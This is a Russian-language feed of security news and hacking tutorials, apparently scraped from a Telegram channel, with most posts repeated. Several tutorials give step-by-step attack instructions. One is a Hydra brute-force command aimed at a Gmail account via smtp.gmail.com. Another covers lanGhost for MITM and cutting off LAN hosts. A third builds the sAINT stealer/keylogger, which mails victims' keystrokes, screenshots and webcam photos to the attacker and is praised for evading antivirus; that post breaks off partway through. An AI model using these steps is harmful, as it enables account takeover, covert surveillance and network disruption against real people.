Amazon представила собственную технологию распознавания ладони
Технология Amazon One считается перспективной: в компании уверены, что в будущем она выйдет за пределы розничной сети и будет использоваться для идентификации людей в офисных зданиях, на стадионах и т.д.
В отличие от сканеров отпечатков пальцев на смартфонах, технология Amazon One еще и бесконтактная. Она может распознать ладонь клиента с расстояния, сопоставить данные с учетной записью Amazon Prime и автоматически списать средства с уже привязанной к аккаунту кредитки.
Сейчас технологий доступна в двух магазинах Amazon Go в Сиэтле (штат Вашингтон). В этой торговой точке используется самообслуживание без кассиров. Посетителю потребуется зарегистрироваться при первом посещении в специальном приложении. В нем же указываются данные кредитной карты. Далее требуется следовать указаниям помощника. После синхронизации карты и ладони покупатель сможет заходить в магазины Сиэтла, просто подержав руку над устройством «около секунды».
«Мы считаем, что технология Amazon One имеет перспективы широкого применения за пределами наших розничных магазинов, поэтому мы также планируем предлагать её использование третьим сторонам, таким как торговые точки, стадионы и офисные центры», — сказал вице-президент по розничному бизнесу Amazon Дилип Кумар (Dilip Kumar).
«Распознавание ладони считается более конфиденциальным, чем некоторые биометрические альтернативы. Вы не можете определить личность человека, глядя на изображение его ладони», – пояснил вице-президент по физическому ретейлу Amazon Дилип Кумар.
Для платежа ладонью клиентам не нужна учетная запись Amazon, достаточно банковской карты и номера телефона. При желании пользователи в любой момент смогут удалить свои биометрические данные из базы компании.
Технология Amazon One считается перспективной: в компании уверены, что в будущем она выйдет за пределы розничной сети и будет использоваться для идентификации людей в офисных зданиях, на стадионах и т.д.
В отличие от сканеров отпечатков пальцев на смартфонах, технология Amazon One еще и бесконтактная. Она может распознать ладонь клиента с расстояния, сопоставить данные с учетной записью Amazon Prime и автоматически списать средства с уже привязанной к аккаунту кредитки.
Сейчас технологий доступна в двух магазинах Amazon Go в Сиэтле (штат Вашингтон). В этой торговой точке используется самообслуживание без кассиров. Посетителю потребуется зарегистрироваться при первом посещении в специальном приложении. В нем же указываются данные кредитной карты. Далее требуется следовать указаниям помощника. После синхронизации карты и ладони покупатель сможет заходить в магазины Сиэтла, просто подержав руку над устройством «около секунды».
«Мы считаем, что технология Amazon One имеет перспективы широкого применения за пределами наших розничных магазинов, поэтому мы также планируем предлагать её использование третьим сторонам, таким как торговые точки, стадионы и офисные центры», — сказал вице-президент по розничному бизнесу Amazon Дилип Кумар (Dilip Kumar).
«Распознавание ладони считается более конфиденциальным, чем некоторые биометрические альтернативы. Вы не можете определить личность человека, глядя на изображение его ладони», – пояснил вице-президент по физическому ретейлу Amazon Дилип Кумар.
Для платежа ладонью клиентам не нужна учетная запись Amazon, достаточно банковской карты и номера телефона. При желании пользователи в любой момент смогут удалить свои биометрические данные из базы компании.
Доступ к Termux по отпечатку пальца
Termux - приложение реализующее Linux-подобную среду взаимодействие с которой происходит посредством консоли без необходимости иметь root-права на устройстве. Некоторое количество интересных статей по Termux вы можете найти на нашем канале, введя хештег #termux
В случае, если у смартфона есть датчик отпечатка пальца его можно использовать как аутентификатор для Termux. Но данная функция работает только на поздних версиях Android и самого приложения.
Установка
Открыв новую сессию, для начала нужно обновить пакеты
◽️
◽️
◽️
Переходим в директорию с инструментами и ставим права на исполняемый файл
◽️
◽️
#termux #безопасность
Termux - приложение реализующее Linux-подобную среду взаимодействие с которой происходит посредством консоли без необходимости иметь root-права на устройстве. Некоторое количество интересных статей по Termux вы можете найти на нашем канале, введя хештег #termux
В случае, если у смартфона есть датчик отпечатка пальца его можно использовать как аутентификатор для Termux. Но данная функция работает только на поздних версиях Android и самого приложения.
Установка
Открыв новую сессию, для начала нужно обновить пакеты
◽️
pkg update upgrade -y
Далее установим git◽️
pkg install git
И скачаем само решение◽️
git clone https://github.com/MrAlpha786/termux-fingerprint-lock
НастройкаПереходим в директорию с инструментами и ставим права на исполняемый файл
◽️
cd termux-fingerprint-lock
◽️chmod u+x setup
Далее запускаем его◽️
bash setup
В процессе выполнения программы попросит прислонить палец к сенсору. Готово. Теперь при последующем входе в Термукс, для появления данных на экране нужно будет сначала просканировать отпечаток.#termux #безопасность
Эксперт Avast заставил кофемашину вымогать деньги
Мартин Хрон, исследователь в области кибербезопасности из компании Avast, провел эксперимент по взлому «умных» кофемашин и выяснил, что эти аппараты можно атаковать даже с помощью программы-вымогателя.
Как рассказал Хрон в своем блоге, он пытался взломать кофемашину без необходимости вторжения в сеть, к которой она подключена. Изучив принцип работы атакуемого устройства, он выяснил, что кофемашина также выполняля роль точки доступа Wi-Fi и устанавливала незащищенное подключение с управляющим приложением.
Затем эксперт изучил механизм обновления прошивки. Как и следовало ожидать, апдейты также не шифровались, не требовали никакой аутентификации и не задействовали даже элементарной подписи кода.
Тогда исследователь попытался создать вредоносно функционирующее устройство, зловредную деятельность которого можно остановить только после оплаты выкупа. Триггером для атаки выступало подключение кофемашины к Сети, вредоносный код выводил устройство из строя и требовал выкуп. Дополнительным стимулом для оплаты выступала особая функция, которую Хрон включил в свой код: кофемашина постоянно задействовала очень шумные кофемолку и водонагреватель.
Поскольку в этот момент находиться рядом с кофемашиной практически невозможно, у жертвы остается два выхода: выдернуть шнур из розетки или заплатить выкуп. Но если выбрать первый вариант, надо быть готовым к тому, что при повторном включении машина начнет с того, на чем закончила — будет сильно шуметь и требовать выкуп.
#новость
Мартин Хрон, исследователь в области кибербезопасности из компании Avast, провел эксперимент по взлому «умных» кофемашин и выяснил, что эти аппараты можно атаковать даже с помощью программы-вымогателя.
Как рассказал Хрон в своем блоге, он пытался взломать кофемашину без необходимости вторжения в сеть, к которой она подключена. Изучив принцип работы атакуемого устройства, он выяснил, что кофемашина также выполняля роль точки доступа Wi-Fi и устанавливала незащищенное подключение с управляющим приложением.
Затем эксперт изучил механизм обновления прошивки. Как и следовало ожидать, апдейты также не шифровались, не требовали никакой аутентификации и не задействовали даже элементарной подписи кода.
Тогда исследователь попытался создать вредоносно функционирующее устройство, зловредную деятельность которого можно остановить только после оплаты выкупа. Триггером для атаки выступало подключение кофемашины к Сети, вредоносный код выводил устройство из строя и требовал выкуп. Дополнительным стимулом для оплаты выступала особая функция, которую Хрон включил в свой код: кофемашина постоянно задействовала очень шумные кофемолку и водонагреватель.
Поскольку в этот момент находиться рядом с кофемашиной практически невозможно, у жертвы остается два выхода: выдернуть шнур из розетки или заплатить выкуп. Но если выбрать первый вариант, надо быть готовым к тому, что при повторном включении машина начнет с того, на чем закончила — будет сильно шуметь и требовать выкуп.
#новость
Сборник OSINT инструментов
Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
◽️
Запускаем The Inspector командой
◽️
#kali #OSINT
Сборники инструментов предназначенных для определенного спектра атак давно стали основной составляющей базового набора для пентеста. Сюда можно добавить и фреймворк The Inspector, который включает в себя модули для получения информации о телефоне либо о домене, обхода CloudFlare и т.д.
Установка
Устанавливаем Kali Linux.
Скачиваем репозиторий с github
◽️
git clone https://github.com/Moham3dRiahi/Th3inspector
Переходим в директорию с The Inspector, ставим права на установщик и запускаем его◽️
cd Th3inspector
◽️chmod +x install.sh && ./install.sh
ИспользованиеЗапускаем The Inspector командой
◽️
perl Th3inspector.pl
Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.#kali #OSINT
Китайские хакеры похитили у пользователей Facebook $4 млн
На конференции по безопасности Virus Bulletin 2020 члены команды безопасности Facebook раскрыли подробную информацию об одной из самых сложных вредоносных кампаний, которая когда-либо была нацелена на пользователей Facebook. Киберпреступная группировка, получившая название SilentFade, с конца 2018 года по февраль 2019 года использовала вредоносы для покупки рекламы от имени взломанных пользователей.
Хотя активность группировки продолжалась лишь несколько месяцев, по данным Facebook, за это время мошенникам удалось лишить пользователей более 4 000 000 долларов США, и все эти средства были использованы для размещения вредоносной рекламы.
Такие объявления, как правило, ограничивались географическим регионом зараженного пользователя (чтобы ограничить их доступность и не привлекать лишнего внимания), и все строились по одинаковому шаблону. Так, хакеры использовали короткие URL и изображения знаменитостей, чтобы заманить пользователей на разные мошеннические сайты, торгующие сомнительными товарами, включая средства для похудания, кето-таблетки и многое другое.
По словам экспертов, преступники распространяли современную версию вредоноса SilentFade в комплекте с легитимным программным обеспечением, которое они предлагали для загрузки в интернете. Как только троян SilentFade попадал на устройство пользователя под управлением Windows, хакеры получали контроль над компьютером жертвы. Однако вместо того, чтобы злоупотреблять системой для более навязчивых операций, вредонос только заменял легитимные DLL-файлы в установках браузера вредоносными копиями, позволяя SilentFade контролировать браузер.
#новость
На конференции по безопасности Virus Bulletin 2020 члены команды безопасности Facebook раскрыли подробную информацию об одной из самых сложных вредоносных кампаний, которая когда-либо была нацелена на пользователей Facebook. Киберпреступная группировка, получившая название SilentFade, с конца 2018 года по февраль 2019 года использовала вредоносы для покупки рекламы от имени взломанных пользователей.
Хотя активность группировки продолжалась лишь несколько месяцев, по данным Facebook, за это время мошенникам удалось лишить пользователей более 4 000 000 долларов США, и все эти средства были использованы для размещения вредоносной рекламы.
Такие объявления, как правило, ограничивались географическим регионом зараженного пользователя (чтобы ограничить их доступность и не привлекать лишнего внимания), и все строились по одинаковому шаблону. Так, хакеры использовали короткие URL и изображения знаменитостей, чтобы заманить пользователей на разные мошеннические сайты, торгующие сомнительными товарами, включая средства для похудания, кето-таблетки и многое другое.
По словам экспертов, преступники распространяли современную версию вредоноса SilentFade в комплекте с легитимным программным обеспечением, которое они предлагали для загрузки в интернете. Как только троян SilentFade попадал на устройство пользователя под управлением Windows, хакеры получали контроль над компьютером жертвы. Однако вместо того, чтобы злоупотреблять системой для более навязчивых операций, вредонос только заменял легитимные DLL-файлы в установках браузера вредоносными копиями, позволяя SilentFade контролировать браузер.
#новость
Пропускаем весь трафик через Tor в Windows
Пропуск всего трафика через сеть Tor повысит безопасность и анонимность пользователя. Помимо этого, для любого браузера станут доступными сайты доменной зоны .onion.
Минусом данной процедуры является значительное уменьшение скорости интернета, что может привести к невозможности проводить прямые трансляции либо усложнит коммуникацию в том же Zoom, к примеру. Однако этот способ имеет место быть, особенно когда нужно анонимизировать некоторые фоновые процессы.
Установка всего необходимого
Для пропуска трафика через Tor необходимо скачать его клиент. Далее потребуется Proxifier. Скачать его можно отсюда, не забывайте проверить файл антивирусом перед запуском.
Настройка
Запускаем Tor Browser.
Запускаем Proxifier. Во вкладке "Profile" выбираем пункт "Proxy servers". В открывшемся окне нажимаем "Add" и вводим локальный адрес
Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.
Пропуск всего трафика через сеть Tor повысит безопасность и анонимность пользователя. Помимо этого, для любого браузера станут доступными сайты доменной зоны .onion.
Минусом данной процедуры является значительное уменьшение скорости интернета, что может привести к невозможности проводить прямые трансляции либо усложнит коммуникацию в том же Zoom, к примеру. Однако этот способ имеет место быть, особенно когда нужно анонимизировать некоторые фоновые процессы.
Установка всего необходимого
Для пропуска трафика через Tor необходимо скачать его клиент. Далее потребуется Proxifier. Скачать его можно отсюда, не забывайте проверить файл антивирусом перед запуском.
Настройка
Запускаем Tor Browser.
Запускаем Proxifier. Во вкладке "Profile" выбираем пункт "Proxy servers". В открывшемся окне нажимаем "Add" и вводим локальный адрес
127.0.0.1 с портом 9050 и типом Socks 5.Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.
Взломать Mac можно с помощью джейлбрейка для iPhone
По словам исследователей безопасности, с помощью двух эксплоитов для джейлбрейка iPhone можно взломать Mac и MacBook с новейшими чипами безопасности Apple T2.
Техника взлома компьютеров Apple с помощью двух эксплоитов для iPhone весьма сложная, и ее обсуждение уже несколько недель ведется в Twitter и на форуме Reddit. Если все сделать правильно, новая техника позволяет атакующему получить полный контроль над устройством, модифицировать поведение операционной системы, похищать важные данные и развертывать вредоносное ПО.
Исследователи утверждают, что им удалось найти способ, позволяющий запускать код внутри чипа безопасности в процессе его загрузки и модифицировать его поведение. Способ предполагает использование двух джейлбрейков для iPhone – Checkm8 и Blackbird . Это возможно, так как в T2 и iPhone используются одни и те же аппаратные компоненты и некоторые программные функции.
Как сообщает бельгийская ИБ-компания ironPeak, взлом T2 предполагает подключение к Mac/MacBook через USB-C и запуск в процессе его загрузки версии джейлбрейка Checkra1n 0.11.0. Это позволяет создать кабель USB-C, способный автоматически эксплуатировать macOS-устройство во время загрузки. Таким образом атакующий может получить доступ к T2 на уровне суперпользователя, модифицировать и управлять всеми данными на устройстве и даже восстанавливать зашифрованные данные.
Поскольку проблема существует на аппаратном уровне, исправить ее с помощью обновления ПО невозможно. Единственное, что могут сделать пользователи уже после атаки, – переустановить операционную систему чипа BridgeOS.
#новость
По словам исследователей безопасности, с помощью двух эксплоитов для джейлбрейка iPhone можно взломать Mac и MacBook с новейшими чипами безопасности Apple T2.
Техника взлома компьютеров Apple с помощью двух эксплоитов для iPhone весьма сложная, и ее обсуждение уже несколько недель ведется в Twitter и на форуме Reddit. Если все сделать правильно, новая техника позволяет атакующему получить полный контроль над устройством, модифицировать поведение операционной системы, похищать важные данные и развертывать вредоносное ПО.
Исследователи утверждают, что им удалось найти способ, позволяющий запускать код внутри чипа безопасности в процессе его загрузки и модифицировать его поведение. Способ предполагает использование двух джейлбрейков для iPhone – Checkm8 и Blackbird . Это возможно, так как в T2 и iPhone используются одни и те же аппаратные компоненты и некоторые программные функции.
Как сообщает бельгийская ИБ-компания ironPeak, взлом T2 предполагает подключение к Mac/MacBook через USB-C и запуск в процессе его загрузки версии джейлбрейка Checkra1n 0.11.0. Это позволяет создать кабель USB-C, способный автоматически эксплуатировать macOS-устройство во время загрузки. Таким образом атакующий может получить доступ к T2 на уровне суперпользователя, модифицировать и управлять всеми данными на устройстве и даже восстанавливать зашифрованные данные.
Поскольку проблема существует на аппаратном уровне, исправить ее с помощью обновления ПО невозможно. Единственное, что могут сделать пользователи уже после атаки, – переустановить операционную систему чипа BridgeOS.
#новость
Манипулирование компьютерами в локальной сети
Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.
Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.
Установка
Устанавливаем Kali Linux.
Обновляем репозитории
◽️
◽️
◽️
◽️
Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali
Даже в локальных сетях не стоит пренебрегать безопасностью. Это в большей степени касается предприятий с обширными корпоративными сетями. Возможность локально подключиться и манипулировать компьютером определенного сотрудника может привести к утечкам информации. Мало того многие атаки на корпорации не обходятся без распространения вредоносного ПО по локальной сети, поскольку проще взломать один ПК и через него получить доступ ко всем остальным.
Инструмент lanGhost создан как раз таки для управления локальной сетью. В его функционал входит: отключение интернета у целевого узла, замена всех картинок на веб-ресурсе, MITM и т.д. Реализация представляет собой программу на Python с панелью управления в виде бота Телеграм.
Установка
Устанавливаем Kali Linux.
Обновляем репозитории
◽️
apt-get update –y && apt-get upgrade –y && apt-get dist-upgrade
Устанавливаем Python 3◽️
apt-get install python3 python3-pip
Скачиваем репозиторий◽️
git clone https://github.com/xdavidhu/lanGhost
Переходим в директорию и запускаем установщик◽️
cd LanGhost/
◽️./setup.py
НастройкаДалее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali
Хакеры взломали IT-системы правительства Азербайджана
Исследователи безопасности из подразделения Talos компании Cisco сообщили о вредоносной кампании, в рамках которой хакеры тайно взломали IT-сети правительства Азербайджана и получили доступ к дипломатическим паспортам некоторых официальных лиц.
Кибершпионаж часто совпадает с активизацией военных действий. Через несколько дней после того, как президент Азербайджана призвал к мобилизации солдат запаса, хакеры использовали в качестве приманки поддельный правительственный документ на ту же тему в ходе своих атак. Вредоносный код, внедренный в документ, способен похищать данные со взломанного компьютера и предоставить хакерам постоянный доступ к устройству.
Эксперты обнаружили шпионскую группировку в апреле нынешнего года. Вредоносное ПО преступников получило название PoetRAT, поскольку код был переполнен литературными отсылками. Раньше злоумышленники упоминали Уильяма Шекспира, но в последних обновлениях кода есть намеки на русского писателя Федора Достоевского.
В предыдущих кампаниях вредоносный документ загружал интерпретатор Python и вредонос PoetRAT, который использовал pyminifier для обфускации скрипта Python и предотвращения обнаружения на основе строковых правил или правил YARA.
Теперь новая версия вредоноса создает ZIP-файл на целевой системе и выполняет сценарий Lua в этом архиве. Архив содержит полезную нагрузку Lua и luajit (интерпретатор Lua для Windows). Скрипт загружает и выполняет дополнительную полезную нагрузку.
Специалисты Talos не сообщили, кто несет ответственность за кибератаки и сколько правительственных чиновников Азербайджана пострадало. Они назвали данную деятельность «шпионажем с последствиями для национальной безопасности», осуществляемую группировкой, «проявляющей особый интерес к различным правительственным ведомствам Азербайджана».
#новость
Исследователи безопасности из подразделения Talos компании Cisco сообщили о вредоносной кампании, в рамках которой хакеры тайно взломали IT-сети правительства Азербайджана и получили доступ к дипломатическим паспортам некоторых официальных лиц.
Кибершпионаж часто совпадает с активизацией военных действий. Через несколько дней после того, как президент Азербайджана призвал к мобилизации солдат запаса, хакеры использовали в качестве приманки поддельный правительственный документ на ту же тему в ходе своих атак. Вредоносный код, внедренный в документ, способен похищать данные со взломанного компьютера и предоставить хакерам постоянный доступ к устройству.
Эксперты обнаружили шпионскую группировку в апреле нынешнего года. Вредоносное ПО преступников получило название PoetRAT, поскольку код был переполнен литературными отсылками. Раньше злоумышленники упоминали Уильяма Шекспира, но в последних обновлениях кода есть намеки на русского писателя Федора Достоевского.
В предыдущих кампаниях вредоносный документ загружал интерпретатор Python и вредонос PoetRAT, который использовал pyminifier для обфускации скрипта Python и предотвращения обнаружения на основе строковых правил или правил YARA.
Теперь новая версия вредоноса создает ZIP-файл на целевой системе и выполняет сценарий Lua в этом архиве. Архив содержит полезную нагрузку Lua и luajit (интерпретатор Lua для Windows). Скрипт загружает и выполняет дополнительную полезную нагрузку.
Специалисты Talos не сообщили, кто несет ответственность за кибератаки и сколько правительственных чиновников Азербайджана пострадало. Они назвали данную деятельность «шпионажем с последствиями для национальной безопасности», осуществляемую группировкой, «проявляющей особый интерес к различным правительственным ведомствам Азербайджана».
#новость
Как создать свой сайт в сети TOR с помощью Kali Linux
Практически каждый знает о теневом браузере TOR, который защищает пользователей путем скрытия всех основных данных и открывает доступ к сайтам в доменной зоне .onion. Эти сайты в основном используются для незаконной деятельности, но помимо этого в списке вебресурсов даркнета можно также найти различные информационные форумы, библиотеки, оппозиционные порталы и т.д.
Как подключиться к такому сайту знают многие, но как он функционирует и как его создать не все. Разберем детально этот процесс.
Установка компонентов
Для начала потребуется установить старую версию Kali Linux, к примеру 1.0.6.
Далее устанавливаем и распаковываем Shallot
◽️
◽️
◽️
На данном этапе нужно сначала получить домен. Делается это командой
◽️
Далее запускаем Tor и lighttpd
◽️
◽️
◽️
Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️
#kali #TOR
Практически каждый знает о теневом браузере TOR, который защищает пользователей путем скрытия всех основных данных и открывает доступ к сайтам в доменной зоне .onion. Эти сайты в основном используются для незаконной деятельности, но помимо этого в списке вебресурсов даркнета можно также найти различные информационные форумы, библиотеки, оппозиционные порталы и т.д.
Как подключиться к такому сайту знают многие, но как он функционирует и как его создать не все. Разберем детально этот процесс.
Установка компонентов
Для начала потребуется установить старую версию Kali Linux, к примеру 1.0.6.
Далее устанавливаем и распаковываем Shallot
◽️
wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip
Переходим в созданную директорию и запускаем сборку командами◽️
cd Shallot-master
◽️./configure
◽️make
Теперь установим непосредственно Tor и lighttpd◽️
apt-get install tor
◽️apt-get install lighttpd
НастройкаНа данном этапе нужно сначала получить домен. Делается это командой
◽️
./shallot ^codered
Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.Далее запускаем Tor и lighttpd
◽️
service tor start
◽️service lighttpd start
В файле /etc/tor/torrc нужно будет добавить такие строки◽️
HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080
В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку◽️
ExcludeNodes {ru}, {ua}, {be}
Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️
server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"
Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.#kali #TOR
Google предоставляет полиции данные о пользователях по ключевым словам
Ничто так не характеризует человека, как его история поиска в интернете, и для того чтобы получить столь важные сведения о пользователе, сотрудникам правоохранительных органов требуется решение суда. Тем не менее, как показывают недавно рассекреченные судебные материалы, следователи могут действовать и в обратном порядке – запрашивать не историю поиска конкретного подозреваемого, а перечень всех пользователей, вводивших в поисковик определенные ключевые слова.
Так, в августе нынешнего года полиция арестовала помощника певца R. Kelly, обвиняемого в сексуальных домогательствах, Майкла Уильямса за поджог автомобиля свидетеля в штате Флорида. Его обвинили в поджоге внедорожника, который стоял рядом с домой одной из жертв певца. По словам прокуроров, накануне М. Уильямс искал в интернете информацию о запугивании свидетелей и фальсификациях, а также о странах, у которых нет договора об экстрадиции с США, сообщает CNet.
Согласно материалам суда, Google предоставила полиции IP-адреса пользователей, искавших адрес жертвы, и ей удалось связать IP-адрес с номером телефона М. Уильямса. По этому номеру следствие смогло установить местонахождение подозреваемого на момент пожара и подтвердить, что именно он осуществил поджог.
Как сообщили представители Google в четверг, 8 октября, компания заботится о защите конфиденциальности своих пользователей, при этом оказывая содействие правоохранительным органам. Как уточнил директор по работе с правоохранительными органами и информационной безопасности Google Ричард Салгадо, такие запросы составляют менее 1% от общего числа ордеров и небольшую часть от общих запросов на раскрытие пользовательских данных, которые компания получает в настоящее время.
#новость
Ничто так не характеризует человека, как его история поиска в интернете, и для того чтобы получить столь важные сведения о пользователе, сотрудникам правоохранительных органов требуется решение суда. Тем не менее, как показывают недавно рассекреченные судебные материалы, следователи могут действовать и в обратном порядке – запрашивать не историю поиска конкретного подозреваемого, а перечень всех пользователей, вводивших в поисковик определенные ключевые слова.
Так, в августе нынешнего года полиция арестовала помощника певца R. Kelly, обвиняемого в сексуальных домогательствах, Майкла Уильямса за поджог автомобиля свидетеля в штате Флорида. Его обвинили в поджоге внедорожника, который стоял рядом с домой одной из жертв певца. По словам прокуроров, накануне М. Уильямс искал в интернете информацию о запугивании свидетелей и фальсификациях, а также о странах, у которых нет договора об экстрадиции с США, сообщает CNet.
Согласно материалам суда, Google предоставила полиции IP-адреса пользователей, искавших адрес жертвы, и ей удалось связать IP-адрес с номером телефона М. Уильямса. По этому номеру следствие смогло установить местонахождение подозреваемого на момент пожара и подтвердить, что именно он осуществил поджог.
Как сообщили представители Google в четверг, 8 октября, компания заботится о защите конфиденциальности своих пользователей, при этом оказывая содействие правоохранительным органам. Как уточнил директор по работе с правоохранительными органами и информационной безопасности Google Ричард Салгадо, такие запросы составляют менее 1% от общего числа ордеров и небольшую часть от общих запросов на раскрытие пользовательских данных, которые компания получает в настоящее время.
#новость
Взлом почты Gmail с помощью XHYDRA
Взлом почты особенно страшен тем, что через неё злоумышленник может восстановить доступ сразу к нескольким соцсетям пользователя. Поэтому лучше периодически проверять email на компрометацию в соответственных сервисах.
Сам процесс взлома может быть любым, от фишинга до брутфорса. О последнем сегодня речь и пойдет. Реализация атаки перебором для почтовых ящиков на протоколе smtp работает быстрее и стабильней, чем стандартные запросы на форму входа на сайте. Автоматизировать весь процесс будет утилита xHydra.
Использование xHydra
Поскольку xHydra уже предустановлена в Kali Linux шаг установки можно пропустить. Остается её запустить, выбрав в меню быстрого доступа "Password Attacks" раздел "Online Attacks" пункт "hydra-gtk" или просто прописав название программы в поиск.
Откроется графический интерфейс Hydra. Поскольку тестовую атаку будем проводить на адрес Gmail, то во вкладке "Target" в поля "Single Target", "Port Number" и "Protocol" вписываем значения
Теперь остается только перейти во вкладку "Start" и нажать одноименную кнопку. Перебрав все пароли из словаря Hydra выведет результат работы. Этот способ можно также реализовать с помощью команды
◽️
Взлом почты особенно страшен тем, что через неё злоумышленник может восстановить доступ сразу к нескольким соцсетям пользователя. Поэтому лучше периодически проверять email на компрометацию в соответственных сервисах.
Сам процесс взлома может быть любым, от фишинга до брутфорса. О последнем сегодня речь и пойдет. Реализация атаки перебором для почтовых ящиков на протоколе smtp работает быстрее и стабильней, чем стандартные запросы на форму входа на сайте. Автоматизировать весь процесс будет утилита xHydra.
Использование xHydra
Поскольку xHydra уже предустановлена в Kali Linux шаг установки можно пропустить. Остается её запустить, выбрав в меню быстрого доступа "Password Attacks" раздел "Online Attacks" пункт "hydra-gtk" или просто прописав название программы в поиск.
Откроется графический интерфейс Hydra. Поскольку тестовую атаку будем проводить на адрес Gmail, то во вкладке "Target" в поля "Single Target", "Port Number" и "Protocol" вписываем значения
smtp.gmail.com, 465 и smtp соответственно. Далее в разделе "Passwords" нужно указать логин атакуемого пользователя вписав его в пункт "Username". Логином выступает сама почта. В поле "Password List" нужно указать путь к словарю паролей.Теперь остается только перейти во вкладку "Start" и нажать одноименную кнопку. Перебрав все пароли из словаря Hydra выведет результат работы. Этот способ можно также реализовать с помощью команды
◽️
hydra -l <адрес gmail> -P <путь к словарю> -s 465 smtp.gmail.com smtp -v -V -f -t 1 -e nrs -S
#kali #хакингАрмия США провела операцию в киберпространстве для защиты выборов
Киберкомандование США провело операцию против одного из крупнейших ботнетов Trickbot в рамках усилий по защите выборов президента США от внешнего вмешательства, сообщает газета Washington Post.
По данным газеты, военные США запустили операцию по временному нарушению работы Trickbot, состоящего из "не менее 1 миллиона захваченных компьютеров", которыми управляют "русскоязычные преступники".
По оценкам военных США Trickbot является одной из крупнейших бот-сетей в мире. Она используется для кражи финансовых данных и распространения вредоносного программного обеспечения.
Как объяснили источники издания, операция не предполагала полного уничтожения сети, "но это один из способов отвлечь их хотя бы на некоторое время, пока они пытаются восстановить работу".
В сентябре глава киберкомандования сухопутных войск США генерал Стивен Фогарти заявлял, что военные США активно готовят концепции информационной борьбы в киберпространстве в преддверии выборов 2020 года. По его словам, США должны открыто заявить оппонентам о проведении подобных операций, потому что это продемонстрирует, что Вашингтон не будет просто терпеть их действия, а готов дать ответ.
#новость
Киберкомандование США провело операцию против одного из крупнейших ботнетов Trickbot в рамках усилий по защите выборов президента США от внешнего вмешательства, сообщает газета Washington Post.
По данным газеты, военные США запустили операцию по временному нарушению работы Trickbot, состоящего из "не менее 1 миллиона захваченных компьютеров", которыми управляют "русскоязычные преступники".
По оценкам военных США Trickbot является одной из крупнейших бот-сетей в мире. Она используется для кражи финансовых данных и распространения вредоносного программного обеспечения.
Как объяснили источники издания, операция не предполагала полного уничтожения сети, "но это один из способов отвлечь их хотя бы на некоторое время, пока они пытаются восстановить работу".
В сентябре глава киберкомандования сухопутных войск США генерал Стивен Фогарти заявлял, что военные США активно готовят концепции информационной борьбы в киберпространстве в преддверии выборов 2020 года. По его словам, США должны открыто заявить оппонентам о проведении подобных операций, потому что это продемонстрирует, что Вашингтон не будет просто терпеть их действия, а готов дать ответ.
#новость
Продвинутый стиллер на Java
Практически все сталкивались с такими понятиями, как стиллер или кейлогер. Они бывают различных типов и реализаций, но конечная цель работы каждого - это компрометация информации атакуемого пользователя.
Продвинутый стиллер sAINT, который написан полностью на Java, совмещает в себе стиллер и кейлогер. С его помощью можно по почте получать фото с вебкамеры, снимок экрана и файл с нажатыми клавишами, при достижении установленного количества введенных символов.
Установка
Для начала нужно установить фреймворк maven
◽
Скачиваем билдер с github
◽
Переходим в созданную директорию и ставим права на скрипт установки
◽
Далее нужно будет создать почту gmail, через которую sAINT автоматически будет присылать собранную информацию. Также, перейдя по ссылке, необходимо разрешить отправку с ненадежных приложений.
Использование
Запускаем билдер командой
◽
Далее нужно настроить функционал будущего стиллера. В меню все конкретно написано: в первом пункте адрес созданной почты, во втором пароль от нее и т.д. В итоге останется только подтвердить информацию.
Готово, вирус собран в .jar файл, который вполне можно преобразовать в .exe. Интересной особенностью данного стиллера является его низкий показатель обнаружения антивирусами.
Практически все сталкивались с такими понятиями, как стиллер или кейлогер. Они бывают различных типов и реализаций, но конечная цель работы каждого - это компрометация информации атакуемого пользователя.
Продвинутый стиллер sAINT, который написан полностью на Java, совмещает в себе стиллер и кейлогер. С его помощью можно по почте получать фото с вебкамеры, снимок экрана и файл с нажатыми клавишами, при достижении установленного количества введенных символов.
Установка
Для начала нужно установить фреймворк maven
◽
apt-get install maven -yСкачиваем билдер с github
◽
